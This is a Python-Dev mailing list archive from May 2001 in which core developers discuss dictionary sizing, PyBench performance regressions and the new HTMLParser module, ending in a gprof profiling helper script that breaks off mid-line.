<3B04CEAC.57251CD7@lemburg.com> Message-ID: [MAL] > FYI, I have a patch which inlines small dictionaries directly > into the type object You don't mean that, but how about uploading the patch to SF anyway? Assign it to me and I'll dig into it. > ... > I've experimented with the minimal size a lot and found that > setting it to 8 slots gives the bext performance/memory tradeoff. Having done just a couple rounds of instrumented runs across various apps, I was moving to that conclusion too. Also that "small" dicts are so common that avoiding the "extra" malloc would be a nice win for them, and that large dicts are rare enough and resizing expensive enough anyway that the new cost of doing a two-headed allocation strategy would be lost in the noise. IOW, I'm inclined to believe that everything you say your patch does is Good For Python, and Guido is so sympathetic to my lack of sleep lately that I bet he'll let me slip in one uglification without scowling . From mal@lemburg.com Fri May 18 12:36:28 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 13:36:28 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B05093C.8248AE96@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. Right, I meant the dict object... (the "not enough coffee" thingie again ;-) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . I'll see if I find time today to rework the patch for Python CVS. The patch is hiding in my old Python 1.5 killer patch ;-) -- which gives more than a 50% boost on my machine, but that's another story. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal@lemburg.com Fri May 18 12:38:39 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 13:38:39 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0509BF.A2F84A30@lemburg.com> Tim Peters wrote: > > [Jeremy] > > I also did a profile run on CreateInstances, which has a difference of > > +55.54% on my machine. It's basically the same story. The instance > > dictionary is getting resized more often with Python 2.1+ than it did > > with Python 1.5.2. I wouldn't be surprised if several more tests are > > showing a slowdown with the same cause. > > > > So boosting the minimum size sounds like a good thing. > > I don't know. PyBench is great for showing that *something* changed, but > it's got even less claim to "typical use" than pystone. It doesn't claim "typical use". pybench is aimed at finding out performance issues about hot-spots -- there's no such thing as a "typical program", so pybench gives you low level performance compares for very specific tasks, e.g. dictionary creation or for-loop performance. I have found it to be rather successful at that. At least gives some good hints at where to look... > I don't know that the test suite is better in that respect, but it's got much > more variety and everyone has it . I stuffed code in dict_dealloc() to > record the ma_fill of each dict on its way to the grave (ma_fill == number of > non-virgin slots). Across the test suite, here's the ranking, from most to > least popular fill: > > count fill %total cumulative % > ------ ---- ------ ------------ > 146321 1 53.30 53.30 > 38200 0 13.91 67.21 > 32616 2 11.88 79.09 > 29648 3 10.80 89.89 > 9884 5 3.60 93.49 > 5423 4 1.98 95.47 > 2428 6 0.88 96.35 > 2016 8 0.73 97.08 > 1179 7 0.43 97.51 > 904 9 0.33 97.84 > 709 103 0.26 98.10 > 554 10 0.20 98.30 > 513 13 0.19 98.49 > 459 12 0.17 98.66 > 447 11 0.16 98.82 > 364 14 0.13 98.95 > 233 15 0.08 99.04 > 231 16 0.08 99.12 > 193 18 0.07 99.19 > 180 17 0.07 99.26 > 122 19 0.04 99.30 > 107 30 0.04 99.34 > 105 21 0.04 99.38 > 93 22 0.03 99.41 > 93 20 0.03 99.45 > 86 256 0.03 99.48 > 82 23 0.03 99.51 > 80 26 0.03 99.54 > 74 24 0.03 99.56 > 69 27 0.03 99.59 > 64 25 0.02 99.61 > 60 29 0.02 99.63 > 49 28 0.02 99.65 > 44 34 0.02 99.67 > 33 32 0.01 99.68 > 28 31 0.01 99.69 > 27 37 0.01 99.70 > 27 33 0.01 99.71 > 26 35 0.01 99.72 > 24 36 0.01 99.73 > 23 39 0.01 99.74 > 23 38 0.01 99.75 > 21 128 0.01 99.75 > 19 44 0.01 99.76 > 19 40 0.01 99.77 > 17 46 0.01 99.77 > 16 48 0.01 99.78 > 15 47 0.01 99.78 > 14 50 0.01 99.79 > 14 42 0.01 99.79 > > There are many more sizes, but I cut off the display here when they got too > rare to round to 1% of 1% of the total count. > > Boosting the first non-empty size to 8 would allow 93+% of all dicts to get > away with at most one resize (a dict of size 8 is enough for a fill of 5, but > not 6). OTOH, the current first non-empty size of 4 is enough for 79% of all > dicts (enough for a fill of 2, but not 3). If oodles of those tiny dicts are > alive *at the same time*, it would be quite a waste of space to force the > non-empty ones to carry 8 slots. OTOH, if those small dicts are due to > things like building one- or two-element keyword argument dicts, their > lifetimes rarely overlap. I found that instance dictionaries are usual within the 8 slot range. You normally have a few heavy wheight instances and many light wheight ones which only have two or three attributes in their instance dict. > A more aggressive idea is to allow denser dicts, by allowing them to become > no more than 75% full. That is, change the resize test from > > mp->ma_fill*3 >= mp->ma_size*2 > > to > > mp->ma_fill*4 > mp->ma_size*3 > > That would allow the 10.8% of real(er) life dicts with fill 3 to continue > living in dicts with 4 slots, and allow about 90% of all dicts to get away > with no more than one resize. The downside is that boosting the max load > factor from 2/3 to 3/4 yields, "in theory", and for a dict hugging the limit, > a small boost in the expected # of compares. But the "theory" is for random > hash functions with "uniform probing" (tech term that does *not* mean linear > probing), and Python's hash functions often aren't random at all, while AFAIK > no rigorous analysis of its probing strategy exists. > > So, plenty of arbitrary data there upon which to flip a coin . Why not make those parameters macros at the top of dictobject.c which can then be tuned to whatever the programmer needs/wants ?! -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Fri May 18 16:05:45 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 10:05:45 -0500 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 04:32:39 -0400." References: Message-ID: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. (I guess he means the buffer is alloc'ed contiguously with the dict object head. That's often a nice strategy. Could do that for small lists too maybe, except those haven't gotten anybody's attention just yet.) > > ... > > I've experimented with the minimal size a lot and found that > > setting it to 8 slots gives the bext performance/memory tradeoff. > > Having done just a couple rounds of instrumented runs across various apps, I > was moving to that conclusion too. Also that "small" dicts are so common > that avoiding the "extra" malloc would be a nice win for them, and that large > dicts are rare enough and resizing expensive enough anyway that the new cost > of doing a two-headed allocation strategy would be lost in the noise. IOW, > I'm inclined to believe that everything you say your patch does is Good For > Python, and Guido is so sympathetic to my lack of sleep lately that I bet > he'll let me slip in one uglification without scowling . Yeah, this one sounds like a nice improvement. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas@xs4all.net Fri May 18 16:00:21 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:00:21 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181505.KAA16890@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 10:05:45AM -0500 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> Message-ID: <20010518170021.B16811@xs4all.nl> On Fri, May 18, 2001 at 10:05:45AM -0500, Guido van Rossum wrote: > (I guess he means the buffer is alloc'ed contiguously with the dict > object head. That's often a nice strategy. Could do that for small > lists too maybe, except those haven't gotten anybody's attention just > yet.) Sounds to me like it would benifit tuples even more than lists or dicts. At least in my code, I see more short tuples than short lists, and they are usually not altered after creation ;-) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From fdrake@acm.org Fri May 18 16:12:34 2001 From: fdrake@acm.org (Fred L. Drake, Jr.) Date: Fri, 18 May 2001 11:12:34 -0400 (EDT) Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <15109.15330.592471.32664@cj42289-a.reston1.va.home.com> Thomas Wouters writes: > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) The slots of tuples are already allocated inline, so I don't think they'll get much better. ;-) -- Fred L. Drake, Jr. PythonLabs at Digital Creations From guido@digicool.com Fri May 18 16:27:39 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:27:39 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 17:00:21 +0200." <20010518170021.B16811@xs4all.nl> References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> Message-ID: <200105181527.KAA19923@cj20424-a.reston1.va.home.com> > > (I guess he means the buffer is alloc'ed contiguously with the dict > > object head. That's often a nice strategy. Could do that for small > > lists too maybe, except those haven't gotten anybody's attention just > > yet.) > > Sounds to me like it would benifit tuples even more than lists or dicts. At > least in my code, I see more short tuples than short lists, and they are > usually not altered after creation ;-) Which is why tuples already have this feature. Posted before your first cup of coffee? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@effbot.org Fri May 18 16:36:39 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Fri, 18 May 2001 17:36:39 +0200 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 References: Message-ID: <004401c0dfb0$57b7df00$e46940d5@hagrid> guido wrote: > A much improved HTML parser -- a replacement for sgmllib. The API is > derived from but not quite compatible with that of sgmllib, so it's a > new file. I suppose it needs documentation, and htmllib needs to be > changed to use this instead of sgmllib, and sgmllib needs to be > declared obsolete. any reason this cannot be made compatible with sgmllib? Cheers /F From thomas@xs4all.net Fri May 18 16:36:42 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Fri, 18 May 2001 17:36:42 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181527.KAA19923@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 11:27:39AM -0400 References: <200105181505.KAA16890@cj20424-a.reston1.va.home.com> <20010518170021.B16811@xs4all.nl> <200105181527.KAA19923@cj20424-a.reston1.va.home.com> Message-ID: <20010518173642.S16791@xs4all.nl> On Fri, May 18, 2001 at 11:27:39AM -0400, Guido van Rossum wrote: > > > (I guess he means the buffer is alloc'ed contiguously with the dict > > > object head. That's often a nice strategy. Could do that for small > > > lists too maybe, except those haven't gotten anybody's attention just > > > yet.) > > > > Sounds to me like it would benifit tuples even more than lists or dicts. At > > least in my code, I see more short tuples than short lists, and they are > > usually not altered after creation ;-) > > Which is why tuples already have this feature. > > Posted before your first cup of coffee? :-) No, after my last meeting, before my first witbier of the friday-afternoon-office-beer-binge :) TGIF ;) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido@digicool.com Fri May 18 16:49:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 11:49:25 -0400 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Lib HTMLParser.py,NONE,1.1 In-Reply-To: Your message of "Fri, 18 May 2001 17:36:39 +0200." <004401c0dfb0$57b7df00$e46940d5@hagrid> References: <004401c0dfb0$57b7df00$e46940d5@hagrid> Message-ID: <200105181549.KAA20101@cj20424-a.reston1.va.home.com> > guido wrote: > > A much improved HTML parser -- a replacement for sgmllib. The API is > > derived from but not quite compatible with that of sgmllib, so it's a > > new file. I suppose it needs documentation, and htmllib needs to be > > changed to use this instead of sgmllib, and sgmllib needs to be > > declared obsolete. > > any reason this cannot be made compatible with sgmllib? The sgmllib API design has a few real bogosities. I can't recall what they were, but we looked into keeping it compatible, and it wasn't worth the pain. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Fri May 18 17:57:34 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 12:57:34 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Thu, 17 May 2001 21:45:29 +0200." <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> References: <200105171945.f4HJjTj01942@mira.informatik.hu-berlin.de> Message-ID: <200105181657.LAA20517@cj20424-a.reston1.va.home.com> > According to the CVS log, this implementation of do_cmp was installed > in object.c 2.105, by gvanrossum, on 2001/01/17. What was the specific > rationale for doing do_cmp in that order? You can ask me directly, loewis. :-) I believe that my thinking at the time was that tp_compare should only be used as a final fallback, just before comparing by address. This was consistent with my desire to completely get rid of tp_compare. But until that is done, I now agree that it makes more sense to try tp_compare first when a three-way-compare is requested -- especially in the light of sequence comparison. --Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Fri May 18 18:37:33 2001 From: nas@python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 10:37:33 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B04CEAC.57251CD7@lemburg.com>; from mal@lemburg.com on Fri, May 18, 2001 at 09:26:36AM +0200 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> Message-ID: <20010518103733.A22185@glacier.fnational.com> M.-A. Lemburg wrote: > FYI, I have a patch which inlines small dictionaries directly > into the type object (rather than usin malloc to allocate > the slot buffer). Would it be faster to inline an association table rather than a hash table? Neil From guido@digicool.com Fri May 18 18:43:45 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 13:43:45 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 10:37:33 PDT." <20010518103733.A22185@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> Message-ID: <200105181743.MAA26532@cj20424-a.reston1.va.home.com> > Would it be faster to inline an association table rather than a > hash table? What's an association table? --Guido van Rossum (home page: http://www.python.org/~guido/) From nas@python.ca Fri May 18 19:15:59 2001 From: nas@python.ca (Neil Schemenauer) Date: Fri, 18 May 2001 11:15:59 -0700 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <200105181743.MAA26532@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Fri, May 18, 2001 at 01:43:45PM -0400 References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> Message-ID: <20010518111559.A22344@glacier.fnational.com> Guido van Rossum wrote: > What's an association table? A table of keys and values. Values are looked up by looping over the table comparing each key until the correct one is found (ie. its O(n) where n is the size of the table). For Python, the cost of doing compares probably outweighs the cost of doing the hashing, even for small tables. Its not clear to me though if it would be a win. Assuming that interned strings are the most common key, a assocation table with four entries would take on average two pointer compares to look up a value. Neil From mal@lemburg.com Fri May 18 19:15:37 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Fri, 18 May 2001 20:15:37 +0200 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) References: Message-ID: <3B0566C9.90F17DB1@lemburg.com> Tim Peters wrote: > > [MAL] > > FYI, I have a patch which inlines small dictionaries directly > > into the type object > > You don't mean that, but how about uploading the patch to SF anyway? Assign > it to me and I'll dig into it. There you go: https://sourceforge.net/tracker/?func=detail&aid=425242&group_id=5470&atid=305470 -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Fri May 18 19:23:55 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 14:23:55 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: Your message of "Fri, 18 May 2001 11:15:59 PDT." <20010518111559.A22344@glacier.fnational.com> References: <15108.19887.534514.864376@slothrop.digicool.com> <3B04CEAC.57251CD7@lemburg.com> <20010518103733.A22185@glacier.fnational.com> <200105181743.MAA26532@cj20424-a.reston1.va.home.com> <20010518111559.A22344@glacier.fnational.com> Message-ID: <200105181823.NAA32234@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > What's an association table? > > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (ie. > its O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. > > Its not clear to me though if it would be a win. Assuming that > interned strings are the most common key, a assocation table with > four entries would take on average two pointer compares to look > up a value. > > Neil I see. At the cost of yet another algorithm, of course. --Guido van Rossum (home page: http://www.python.org/~guido/) From James_Althoff@i2.com Fri May 18 20:10:11 2001 From: James_Althoff@i2.com (James_Althoff@i2.com) Date: Fri, 18 May 2001 12:10:11 -0700 Subject: [Python-Dev] Re: Simulating Class (was Re: Does Python have Class methods) Message-ID: Python-dev'ers, Pardon the intrusion, but Aahz Maruch suggested that I post this to the python-dev list. The message below illustrates "yet another class method recipe" that Costas synthesized (and which I then modified very slightly) from various posts following another discussion on python-list about class methods (as we all await the "type/class healing" stuff some of you are working on -- go team!). This variant uses explicit "metaclasses" (defined as regular classes) whose instances ("meta objects") point to class objects (since they cannot *be* class objects in current Python). Anyway, I think the approach has some nice properties. Best regards, Jim ----- Forwarded by James Althoff/AMER/i2Tech on 05/18/01 11:23 AM ----- James Althoff To: python-list@python.org 05/14/01 02:09 cc: PM Subject: Re: Simulating Class (was Re: Does Python have Class methods)(Document link: James Althoff) Costas writes: >Ok, so after looking thru how Python works and comments from people, I >came up with what I believe may be the best way to implement Class >methods and Class variables. > > > >Costas I think this idea is quite good. I would amend it very slightly by suggesting the convention of defining *three* separate names in the enclosing module: 1) the name of the enclosing class 2) the name of the singleton instance of the enclosing class 3) the name of the enclosed class To support this, I would propose using a naming convention as below. If one is interested in defining a class Spam, then use the following names: 1) SpamMetaClass -- names the enclosing class 2) SpamMeta -- names a singleton instance of the enclosing class 3) Spam -- names the enclosed class Use the name SpamMetaClass when you need to derive a subclass of SpamMetaClass, e.g., class SpecialSpamMetaClass(SpamMetaClass): pass Use the name SpamMeta to invoke a class method, e.g., SpamMeta.aClassMethod() Use the name Spam to make instances as usual, e.g., s = Spam() (and to derive a subclass of Spam). Although SpamMetaClass is not a metaclass in the sense of Smalltalk or Ruby -- that is to say, the class Spam is not an instance of SpamMetaClass -- nonetheless, SpamMetaClass still acts as a "higher level" class that provides methods on behalf of the class Spam where said methods are 1) independent of any particular instance of Spam and 2) allow for factory-method-style creation of Spam instances -- these being two very important attributes of the metaclass concept. Plus "meta" is a nice, short name. :-) Plus using "MetaClass" to refer to the class and "Meta" to refer to the singleton instance of "MetaClass" is reasonably clear and succinct, I think. One nice thing about the proposed recipe is that the SpamMeta object is a real class instance of a real class. This means that -- unlike when using the "module function" recipe -- we get inheritance of methods, and -- unlike when using the "callable wrapper class" recipe -- we also get override of methods. The example below illustrates both of these important capabilities. class Class1MetaClass: # Base metaclass # Define "class methods" for Class1 def whoami(self): print 'Class1MetaClass.whoami:', self def new(self): # Factory method """Return a new instance""" return self.Class1() def newList(self,n=3): # Another factory method """Return a list of new instances""" l = [] for i in range(n): newInstance = self.new() l.append(newInstance) return l # Define Class1 & its "instance methods" class Class1: # Base class def whoami(self): print 'Class1.whoami:', self Class1Meta = Class1MetaClass() # Make & name the singleton metaclass instance Class1 = Class1Meta.Class1 # Make the Class1 name accessible class Class2MetaClass(Class1MetaClass): # Derived metaclass # Define "class methods" for Class2 -- Override Class1 "class methods" def whoami(self): print 'Class2MetaClass.whoami:', self def new(self): # Override the factory method return self.Class2() # Define Class2 & its "instance methods" class Class2(Class1): # Derived class def whoami(self): print 'Class2.whoami:', self Class2Meta = Class2MetaClass() # Make & name the singleton metaclass instance Class2 = Class2Meta.Class2 # Make the Class2 name accessible # Test Class1Meta.whoami() # invoke "class method" of base class Class2Meta.whoami() # invoke "class method" of derived class Class1().whoami() # make an instance & invoke "instance method" Class2().whoami() print Class1Meta.newList() # factory method print Class2Meta.newList() # inherit factory method with override >>> reload(meta6) Class1MetaClass.whoami: Class2MetaClass.whoami: Class1.whoami: Class2.whoami: [, , ] [, , ] Jim From tim.one@home.com Fri May 18 20:26:02 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 18 May 2001 15:26:02 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <3B0509BF.A2F84A30@lemburg.com> Message-ID: [MAL] > It [pybench] doesn't claim "typical use". pybench is aimed at finding > out performance issues about hot-spots -- there's no such thing as > a "typical program", so pybench gives you low level performance > compares for very specific tasks, e.g. dictionary creation or > for-loop performance. > > I have found it to be rather successful at that. At least gives > some good hints at where to look... There must be a misunderstanding here. I understand and appreciate all that! >From the instant you created it, PyBench became the best performance canary we have ("canary" in the sense of bringing a bird into the coal mine with you, because when a potentially fatal buildup of gasses occurs, the canary will pass out before you even notice). My point was that making a decision based solely on that PyBench happens to create millions of dicts of exactly size 3, and relatively few of any other size, would be crazy -- which I'm sure you understand and appreciate too. > ... > I found that instance dictionaries are usual within the 8 slot > range. You normally have a few heavy wheight instances and > many light wheight ones which only have two or three attributes > in their instance dict. Matches my observations too. [on dict resize parameters] > Why not make those parameters macros at the top of dictobject.c > which can then be tuned to whatever the programmer needs/wants ?! Bad idea, IMO. If someone understands the dict implementation well enough to be *competent* to change these without, e.g., opening a door to infinite loops, then they already know where these parameters appear, and can change the hardcoded #s themselves. Thr max load factor simply wasn't intended to be adjustable; and if it were, it would be a per-dict decision. From tim.one@home.com Fri May 18 20:48:33 2001 From: tim.one@home.com (Tim Peters) Date: Fri, 18 May 2001 15:48:33 -0400 Subject: [Python-Dev] PyBench DictCreation (was Re: Performance compares) In-Reply-To: <20010518111559.A22344@glacier.fnational.com> Message-ID: [Neil Schemenauer] > A table of keys and values. Values are looked up by looping over > the table comparing each key until the correct one is found (ie. > its O(n) where n is the size of the table). For Python, the cost > of doing compares probably outweighs the cost of doing the > hashing, even for small tables. I thought about that before. The inlining appeals but the algorithm not much: the dict implementation *as is* loops over all the table entries too, except that instead of starting with "i = 0" it starts (now) with "i = hash & mask"; instead of incrementing via "++i" it does "i <<= 1; if (i > mask) i ^= poly"; and instead of giving up when "i >= length" it punts when finding an entry with a null value. Incrementing via ++i is certainly cheaper, except that even when small, the hash table usually hits on the first try when the key is present, so usually gets out before incrementing. > Its not clear to me though if it would be a win. Best guess is not. > Assuming that interned strings are the most common key, a assocation > table with four entries would take on average two pointer compares > to look up a value. Actually an average of 2.5 when the key is present and each key is equally likely to be queried, and always 4 when the queried key is not present. The hash table has better expected stats on both counts, but needs 4 unused slots too to achieve that. The savings would be in memory for small dicts more than in time (if at all). From jeremy@alum.mit.edu Fri May 18 22:07:37 2001 From: jeremy@alum.mit.edu (Jeremy Hylton) Date: Fri, 18 May 2001 17:07:37 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns Message-ID: <200105182107.RAA16214@cliff.concentric.net> I did some profiles of more of the pybench slowdowns this afternoon and found a few causes for several problem benchmarks. I just made a couple of small changes for BuiltinFunctionCalls. The problem here is that PyCFunction calls were optimized for flags == 0 and not flags == METH_VARARGS, which is more common. The scary thing about BuiltinFunctinoCalls is that the profiler shows it spending almost 30% of its time in PyArg_ParseTuple(). It certainly is a shame that we have this complicated, slow run-time parsing mechanism to deal with a static property of the code, namely how many arguments it takes and whether their types are. A few of the other tests, SimpleComplexArithmetic and CreateStringsWithConcat, are slower because of the new coercion logic. I didn't spend much time on SimpleComplexArithmetic, but I did look at CreateStringsWithConcat in some detail. The basic problem is that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls PyNumber_Add("ab", "cd"). This function tries all sorts of different ways to coerce the strings into addable numbers before giving up and trying sequence concat. It looks like the new coercion rules have optimized number ops at the expense of string ops. If you're writing programs with lots of numbers, you probably think that's peachy. If you're parsing HTML, perhaps you don't :-). I looked at the test suite to see how often it is called with non-number arguments. The answer is 77% of the time, but almost all of those calls are from test_unicodedata. If that one test is excluded, the majority of the calls (~90%) are with numbers. But the majority of those calls just come from a few tests -- test_pow, test_long, test_mutants, test_strftime. If I were to do something about the coercions, I would see if there was a way to quickly determine that PyNumber_Add() ain't gonna have any luck. Then we could bail to things like string_concat more quickly. I also looked at SmallLists. It seems that the only significant change since 1.5.2 is the garbage collection. This tests spends a lot more time deallocating lists than it used to, and the only change I see in the code is the GC. I assume, but haven't checked, that the story is similar for SmallTuples. So the primary things that have slowed down since 1.5.2 seem to be: comparisons, coercion, and memory management for containers. These also seem to be the things that have improved the most in terms of features, completeness, etc. Looks like we need to revisit them and sort out the performance issues. Jeremy From guido@digicool.com Fri May 18 22:58:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Fri, 18 May 2001 17:58:25 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: Your message of "Fri, 18 May 2001 17:07:37 EDT." <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> > The scary thing about BuiltinFunctinoCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and whether their types are. I would love to see a mechanism whereby the signature of a C function could be stored as part of the static info about it, in an extension of the PyMethodDef structure: this would serve as documentation, allow for introspection, etc. I'm sure Ping would love this for pydoc and his inspect module. But I'm not sure how much we can speed things up, unless we give up on the tuple interface (an argc/argv API could be much faster since usually the arguments are already on the frame's stack in this form). > A few of the other tests, SimpleComplexArithmetic and > CreateStringsWithConcat, are slower because of the new coercion > logic. I didn't spend much time on SimpleComplexArithmetic, but I did > look at CreateStringsWithConcat in some detail. The basic problem is > that "ab" + "cd" gets compiled to BINARY_ADD, which in turn calls > PyNumber_Add("ab", "cd"). This function tries all sorts of different > ways to coerce the strings into addable numbers before giving up and > trying sequence concat. > > It looks like the new coercion rules have optimized number ops at the > expense of string ops. If you're writing programs with lots of > numbers, you probably think that's peachy. If you're parsing HTML, > perhaps you don't :-). > > I looked at the test suite to see how often it is called with > non-number arguments. The answer is 77% of the time, but almost all > of those calls are from test_unicodedata. If that one test is > excluded, the majority of the calls (~90%) are with numbers. But the > majority of those calls just come from a few tests -- test_pow, > test_long, test_mutants, test_strftime. > > If I were to do something about the coercions, I would see if there > was a way to quickly determine that PyNumber_Add() ain't gonna have > any luck. Then we could bail to things like string_concat more > quickly. There's already a special case for int+int in the BINARY_ADD opcode (otherwise you would probably see more numbers). Maybe another special case for str+str would help here? > I also looked at SmallLists. It seems that the only significant > change since 1.5.2 is the garbage collection. This tests spends a lot > more time deallocating lists than it used to, and the only change I > see in the code is the GC. I assume, but haven't checked, that the > story is similar for SmallTuples. > > So the primary things that have slowed down since 1.5.2 seem to be: > comparisons, coercion, and memory management for containers. These > also seem to be the things that have improved the most in terms of > features, completeness, etc. Looks like we need to revisit them and > sort out the performance issues. Thanks for doing all this work, Jeremy! I just hope that these performance hacks won't have to be redone when I'm done with healing the types/class split. I'm expecting that things can become a lot simpler if everything inherits from Object, sequences inherit from Sequence, and so on. But since I'm currently going slow on this work, I won't complain too much if the existing code gets optimized first. The stuff you already checked in looks good! --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy@digicool.com Fri May 18 23:06:05 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Fri, 18 May 2001 18:06:05 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182158.QAA01250@cj20424-a.reston1.va.home.com> References: <200105182107.RAA16214@cliff.concentric.net> <200105182158.QAA01250@cj20424-a.reston1.va.home.com> Message-ID: <15109.40141.757071.770265@slothrop.digicool.com> In case anyone else is interested, here are two quick pointers on running pybench tests under the profiler. 1. To build Python with profiling hooks (Unix only): LDFLAGS="-pg" OPT="-pg" configure make When you run python it produces a gmon.out file. To run gprof, pass it the profile-enable executable and gmon.out. It's spit out the results on stdout. 2. Use this handy script (below) to run a single pybench test under the profiler and produce the output. Jeremy """Tool to automate profiling of individual pybench benchmarks""" import os import re import tempfile PYCVS = "/home/jeremy/src/python/dist/src/build-pg/python" PY152 = "/home/jeremy/src/python/dist/Python-1.5.2/build-pg/python" rx_grep = re.compile('^([^:]+):(.*)') rx_decl = re.compile('class (\w+)\(\w+\):') def find_bench(name): p = os.popen("grep %s *.py" % name) for line in p.readlines(): mo = rx_grep.search(line) if mo is None: continue file, text = mo.group(1, 2) mo = rx_decl.search(text) if mo is None: continue klass = mo.group(1) return file, klass return None, None def write_profile_code(file, klass, path): i = file.find(".") file = file[:i] f = open(path, 'w') print >> f, "import %s" % file print >> f, "%s.%s().run()" % (file, klass) f.close() def profile(interp, path, result): if os.path.exists("gmon.out"): os.unlink("gmon.out") os.system("PYTHONPATH=. %s %s" % (interp, path)) if not os.path.exists("gmon.out"): raise RuntimeError, "gmon.out not generated by %s" % interp os.system("gprof %s gmon.out > %s" % (interp, result)) def main(bench_name): file, klass = find_bench(bench_name) if file is None: raise ValueError, "could not find class %s" % bench_name code_path = tempfile.mktemp() write_profile_code(file, klass, code_path) profile(PYCVS, 